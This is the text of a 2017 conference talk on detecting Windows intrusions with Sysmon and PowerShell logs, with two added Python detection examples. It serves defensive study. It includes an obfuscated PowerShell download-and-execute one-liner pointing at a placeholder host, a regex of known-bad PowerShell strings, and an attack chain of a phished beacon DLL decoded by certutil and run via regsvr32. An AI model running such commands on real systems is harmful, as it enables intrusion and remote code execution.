Detect the undetectable with Sysinternals Sysmon and Powershell logs
Dimitris Margaritis
Bsides Athens 2017
24/6/2017
- This presentation is made on a personal basis and does not necessarily reflect the position of my employer
10 years with defenders in Greece, 10 years with Red devils in Belgium
Blue is in my genes, BUT the red way of thinking is exciting
Windows logs can be fragile
April 2016
I can detect this in PowerShell logs
Maslow’s Pyramid of Defensive Controls
“Defending Against PowerShell Attacks”, Lee Holmes, Dutch PowerShell User Group, 08-04-2017
Sysmon
Patching, Download controls, Awareness, Antivirus
Application Whitelisting in Deny Mode
Application Whitelisting in Allow Mode
Auditing
Host-based artifacts
Memory-based artifacts
Get-InjectedThread
https://gist.github.com/jaredcatkinson
- Classic Injection
- Reflective DLL Injection
- Memory module
Why Sysmon?
- Features not available in standard Windows logging
- Centralization using Windows Event Forwarding
- It’s “FREE”
- Explosion of Sysmon resources during the last 6 months
Sysmon Installation - Configuration
- Sysmon service can be hidden…
- Can Sysmon be hidden for non-admin users?
…but the process is running and the Sysmon log file is there
Sysmon Events (v6)
Detection with Sysmon : RSA 2016
- Many other sources with detections based on parent-child relationships, e.g. Excel or Word spawning cmd, PowerShell, etc.
Who is my parent?
Now possible for script kiddies like me
Who is doing the network connection?
In the case of Word + COM object: winword.exe
After getting a foothold, spawn everything as an Internet Explorer process
Detection with Sysmon : RSA 2017
Detection with Sysmon : FIRST Conf 2017
http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL.pdf
Sysmon CreateRemoteThread
- Use Keethief against Keepass
- Detection: look for a CreateRemoteThread event with TargetImage keepass.exe
Below is the Sysmon EID 8 after running Keethief:
CreateRemoteThread detected:
UtcTime: 2016-08-04 14:08:20.536
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetImage: C:\Program Files (x86)\KeePass Password Safe 2\KeePass.exe
StartModule: C:\Windows\SYSTEM32\ntdll.dll
CreateRemoteThread to IE to blend in with normal traffic
Powershell “operation” using IE
BUT
Monitor Msbuild.exe and InstallUtil.exe
Sysmon Persistence Detections
HKLM\Software\Microsoft\Windows\CurrentVersion\Run[Once]\
HKCU\Software\Microsoft\Windows\CurrentVersion\Run[Once]\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Defines DLLs that are injected into every application that loads user32.dll; disabled in Windows 8+
sdbinst.exe: abuse of shim databases
Scheduled Tasks
Startup Folder
Detect .hta, .js, .vbs, etc. in the user profile if you don’t block them
Sysmon monitoring for droppers
Hashes of attachments
The pyramid of hell
http://bit.ly/2qPMUeD
Advanced techniques above this line
- Command length
- Regular expression
- Count special characters
- Frequency of characters
EID 400: check EngineVersion
- Sysmon EID 7 ONLY in Windows 10
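The four command-line indicators listed on this slide (length, special characters, character frequency and a regular expression of strings known to be bad) turned into a scorer, as an added example that is not from the talk; the thresholds and the two sample command lines are constructed for illustration and should be tuned against your own baseline.

```python
import math
import re
from collections import Counter

# Characters that are rare in hand-typed administration commands but pile up
# in obfuscated one-liners (string splitting, escaping, invocation operators).
SPECIAL_CHARS = set("`{}[]()+^\"'$;|%&*,@")

# Substrings that survive obfuscation of the rest of the command line, because
# the PowerShell host has to see them to hide the window or decode the payload.
KNOWN_BAD = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}|frombase64string|"
    r"downloadstring|downloadfile|invoke-expression|\biex\b|-nop\b|"
    r"-w(indowstyle)?\s+hidden|-ep\s+bypass|executionpolicy\s+bypass)"
)

# Assumed thresholds (not values from the talk); tune against admin activity.
MAX_LENGTH = 400          # longer than any one-liner an admin normally types
MAX_SPECIAL_RATIO = 0.20  # share of SPECIAL_CHARS in the command line
MAX_ENTROPY = 4.6         # Shannon entropy in bits/char; base64 blobs score high


def special_char_ratio(cmd: str) -> float:
    """Fraction of characters that belong to SPECIAL_CHARS."""
    if not cmd:
        return 0.0
    return sum(1 for c in cmd if c in SPECIAL_CHARS) / len(cmd)


def char_entropy(cmd: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not cmd:
        return 0.0
    n = len(cmd)
    return -sum(k / n * math.log2(k / n) for k in Counter(cmd).values())


def score(cmd: str) -> dict:
    """Evaluate the four indicators and combine them into one verdict."""
    indicators = {
        "long": len(cmd) > MAX_LENGTH,
        "special_chars": special_char_ratio(cmd) > MAX_SPECIAL_RATIO,
        "high_entropy": char_entropy(cmd) > MAX_ENTROPY,
        "known_bad": bool(KNOWN_BAD.search(cmd)),
    }
    hits = sum(indicators.values())
    # A known-bad substring is enough on its own; the statistical indicators
    # have to agree with each other before they raise an alert.
    suspicious = indicators["known_bad"] or hits >= 2
    return {"indicators": indicators, "hits": hits, "suspicious": suspicious}


# Constructed samples: a routine admin command, and an obfuscated launcher whose
# only readable parts are the host flags that cannot be hidden.
BENIGN = "powershell.exe Get-Service -Name wuauserv | Restart-Service"
OBFUSCATED = (
    "powershell.exe -nop -w hidden -c \"&('I'+'EX')((nEw-ObjEcT "
    "('Ne'+'t.We'+'bClient')).('Down'+'loadStr'+'ing').Invoke("
    "'http://example.invalid/p.txt'))\""
)

if __name__ == "__main__":
    for sample in (BENIGN, OBFUSCATED):
        print(score(sample), sample[:50])
```

Sysmon EID 1 and PowerShell EID 4104 both carry the command line or script block text, so the same scorer can run over either source.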
Powershell logs
- Applications and Services Logs > Windows PowerShell : EID 400
- Applications and Services Logs > Microsoft > Windows > PowerShell > Operational : EID 4104 : Script block logs, EID 4103 : Module logs
- Transcription log : txt file
What to look for in PowerShell logs
Recent Attack Scenario
Scenario
- Create and categorize a new domain
- Use domain fronting in Empire or Cobalt Strike
- Create an HTTPS or DNS beacon DLL, base64-encode it, phish a user and deliver it as a .txt
- .txt dropped --> call certutil to decode the .txt into the DLL, call regsvr32 to run the DLL
- Fully patched Windows 10 with application whitelisting in allow mode for executables: compromised.
Blue Team I: WITHOUT endpoint log monitoring
Firewall Admin, AV Admin, IDS Admin, MANAGER
Up-to-date AV and Intrusion Detection System: no ALERT…
Expensive Threat Intel info for IOCs didn’t help…
Blue Team II: WITH endpoint log monitoring
Use Sysmon EID 1 to analyse usage of certutil.exe
- also believes in sharing information and updates its detection playbook frequently
LogName=Microsoft-Windows-Sysmon/Operational EventCode=3 Image: C:\Windows\System32\regsvr32.exe
Regsvr32.exe
Good to monitor network connections to the internet from: powershell, msbuild, bitsadmin, svchost, mshta, rundll32
Attacker abuses Windows commands after getting a foothold
Within 5 minutes I don’t expect an admin to execute all these commands
Abuse of legitimate Windows commands
* Cleaning of “noise” required. My noise is not the same as yours!
Regsvcs, Regasm, InstallUtil, Bginfo, Msbuild, sdclt, eventvwr, fodhelper
UAC bypass credits: @enigma0x3
Application Whitelisting bypass credits: @subTee
Tasklist, nltest /dclist, Schtasks, Whoami, Bitsadmin, certutil, sc, Net*, Wmic*, …
C:\$Recycle.bin\
Command line logs are not enough…
An attacker can perform reconnaissance using Invoke-HostRecon to hide commands from command line logs
Attacker uses PowerShell to download
Sysmon EID 1: it might be detected based on the number of special characters, but it can be found in PowerShell logs by looking for things known to be bad
ATTENTION: If Invoke-Expression is not used, the obfuscation remains in the PowerShell logs
Powershell Scriptblock log
1 month ago: posts for bypassing script block logging.
Module log is still there. Although noisy, the volume can be manageable
Things are moving really fast !!!!!! (6 days ago)
Another bypass?
Defaults… a normal user has access to the PowerShell Operational log
- We enable PS logs for good, but it can be very bad!
- Protected Event Logging is nice but challenging to implement
- Minimum control: don’t allow non-admin users to access PowerShell logs
https://blogs.technet.microsoft.com/kfalde/2017/05/13/securing-your-powershell-operational-logs/
Recent techniques
For blue: your goal is not to detect the Red but the adversaries…
Red Tips useful for blue
https://threatintel.eu/2017/06/03/red-teaming-tips-by-vincent-yiu/
- Block execution in the temp folder by application whitelisting
- Easy detection with Sysmon EID 11 OR 15
ATT&CK - Sigma
ATT&CK Model : Sysmon Detections
ATT&CK is a very good start for gap analysis; however, it is not enough for the latest attacks
What is Sigma?
Open source project by Florian Roth and Thomas Patzke
Sigma is for log files what Snort is for network traffic and YARA is for files.
Sigma Rule example
Sigma Sysmon rules
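As an added example (not from the talk and not the Sigma project's own code): a minimal evaluator for Sigma-style selections, run over constructed Sysmon events for the detections named earlier in the deck (Office spawning a shell, CreateRemoteThread into KeePass, a network connection from a LOLBin such as regsvr32, certutil decoding a dropped file, an executable written to a temp folder). Only the endswith and contains modifiers and list-valued OR are implemented; real Sigma rules are YAML and are converted to SIEM queries with sigmac.

```python
# Rule titles, field names and values are constructed for this example; the
# field names follow Sysmon's own event schema (Image, ParentImage, ...).
RULES = [
    {"title": "Office app spawning a shell (EID 1)",
     "selection": {"EventID": 1,
                   "ParentImage|endswith": ["\\winword.exe", "\\excel.exe"],
                   "Image|endswith": ["\\cmd.exe", "\\powershell.exe"]}},
    {"title": "CreateRemoteThread into KeePass (EID 8)",
     "selection": {"EventID": 8, "TargetImage|endswith": "\\keepass.exe"}},
    {"title": "Network connection from a LOLBin (EID 3)",
     "selection": {"EventID": 3,
                   "Image|endswith": ["\\regsvr32.exe", "\\certutil.exe", "\\mshta.exe",
                                      "\\rundll32.exe", "\\msbuild.exe", "\\bitsadmin.exe"]}},
    {"title": "certutil decoding a dropped file (EID 1)",
     "selection": {"EventID": 1, "Image|endswith": "\\certutil.exe",
                   "CommandLine|contains": "decode"}},
    {"title": "Executable written to a temp folder (EID 11)",
     "selection": {"EventID": 11, "TargetFilename|contains": "\\temp\\",
                   "TargetFilename|endswith": [".exe", ".dll"]}},
]


def _value_matches(actual, modifier, expected):
    """Compare one field value case-insensitively, as Sigma backends do."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "contains":
        return e in a
    return a == e


def selection_matches(selection, event):
    """Every key of a selection must match (AND); a list value is an OR."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        options = expected if isinstance(expected, list) else [expected]
        if not any(_value_matches(event[field], modifier, o) for o in options):
            return False
    return True


def evaluate(events, rules=RULES):
    """Return (rule title, event) pairs for every rule that fires."""
    return [(rule["title"], ev) for ev in events for rule in rules
            if selection_matches(rule["selection"], ev)]


# Constructed events; the TEST-NET-3 addresses and file names are sample
# values, not indicators from any incident.
EVENTS = [
    {"EventID": 1, "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
    {"EventID": 8, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetImage": "C:\\Program Files (x86)\\KeePass Password Safe 2\\KeePass.exe"},
    {"EventID": 3, "Image": "C:\\Windows\\System32\\regsvr32.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -decode beacon.txt beacon.dll"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\certutil.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\beacon.dll"},
    # Benign activity that must stay quiet.
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]


def fired_titles(events=EVENTS):
    """Titles of the rules that fired, in event order (one entry per hit)."""
    return [title for title, _ in evaluate(events)]


if __name__ == "__main__":
    for title in fired_titles():
        print("ALERT:", title)
```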
Sigma rules sharing through MISP
Takeaways
- Log Management System must be installed in a security zone with special controls
“To know your Systems and your Logs is the beginning of security”
- Visibility on endpoints is important
- Climb up the blue pyramid step by step
- Analysing PowerShell logs is a MUST
- Credential theft is not only mimikatz… a password in the browser’s store may be enough
- Critical success factor for Sysmon deployment (and not only): the security team must cooperate perfectly with system administrators
Appendix 1: Cobalt Kitty/APT 32
Operation Cobalt Kitty/APT32
Current trend: attackers using commercial or open source offensive tools
Penetration phase
- Block Word macros from the Internet, e.g. Office feature, EMET, email gateway sanitization
Word file with malicious macro delivering Cobalt Strike Beacon
Schtasks /create, Mshta.exe, regsvr32
Privilege Escalation phase
Persistence phase
• Trivial techniques
  • Registry Autorun
  • Scheduled Tasks
  • Outlook Persistence
• More advanced
  • DLL hijacking against the Wsearch service
Classic parent-child process detection (Office spawning cmd)
Classic registry key monitoring with Sysmon
C2 communication
1) Regsvr32 download
2) Powershell downloads
3) Outlook macro (outlook.exe spawning cmd.exe)
4) CobaltStrike Malleable C2 profiles
5) DNS Tunneling
Detections with DNS logs
Detections with Sysmon and Powershell logs
Defenders blocked powershell.exe
Offensive Powershell Tools leave signs in PowerShell logs
Execution phase
Appendix 2: Centralizing Logs using WEF
Prepare your environment for hunting - investigations
• Install WEC(s) server(s)
• Enable Centralized Logs:
- PowerShell logs config: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- Sysmon config: https://medium.com/@lennartkoopmann/explaining-and-adapting-tays-sysmon-configuration-27d9719a89a8
WEF - Works even with sources outside a domain
- https://mva.microsoft.com/en-US/training-courses/event-forwarding-and-log-analysis-16506?l=fZ2kRFGmC_1304300474
- https://docs.microsoft.com/en-us/windows/threat-protection/use-windows-event-forwarding-to-assist-in-instrusion-detection
- https://msdn.microsoft.com/en-us/library/windows/desktop/bb870973(v=vs.85).aspx
References
Sysmon
1. https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5011/HTA-T09-How-to-go-from-responding-to-hunting-with-Sysinternals-Sysmon.pdf
2. http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL.pdf
3. http://securitylogs.org
4. https://github.com/Neo23x0/sigma/tree/master/rules/windows/sysmon
5. https://github.com/MHaggis/sysmon-dfir
6. https://cyberwardog.blogspot.be
7. http://www.crypsisgroup.com/images/site/CG_WhitePaper_Splunkmon_1216.pdf
Hunting in memory: https://www.endgame.com/blog/technical-blog/hunting-memory
Who to follow on Twitter: http://twitter.com/asfakian/lists/threat-intelligence
References
PowerShell
http://www.leeholmes.com/blog/2016/10/22/more-detecting-obfuscated-powershell/
https://www.asd.gov.au/publications/protect/Securing_PowerShell.pdf
https://adsecurity.org/wp-content/uploads/2017/05/2017-RyersonUniversity-Metcalf-CurrentStateofSecurity-Final.pdf
https://gist.github.com/MatthewDemaske/d23280ef84b0a67e0848577600940ba9
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
https://blogs.msdn.microsoft.com/daviddasneves/2017/05/25/powershell-security-at-enterprise-customers/
https://blogs.technet.microsoft.com/kfalde/2017/05/13/securing-your-powershell-operational-logs/
https://cobbr.io/ScriptBlock-Warning-Event-Logging-Bypass.html
Cobalt Kitty
https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/
Other
https://www.derekseaman.com/2013/06/teched-pass-the-hash-preventing-lateral-movement-atc-b210.html
http://subt0x10.blogspot.be/2017/04/shellcode-injection-via-queueuserapc.html
https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
https://www.sans.org/summit-archives/file/summit-archive-1492714038.pdf
https://drive.google.com/file/d/0Bzb5kQFOXkiSVEVMTy12dlhJcW8/view
http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
http://malwarejake.blogspot.be/2017/01/implications-of-newest-shadow-brokers.html
https://artofpwn.com/phant0m-killing-windows-event-log.html
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Cn33liz/StarFighters
https://github.com/acalarch/ETL-to-EVTX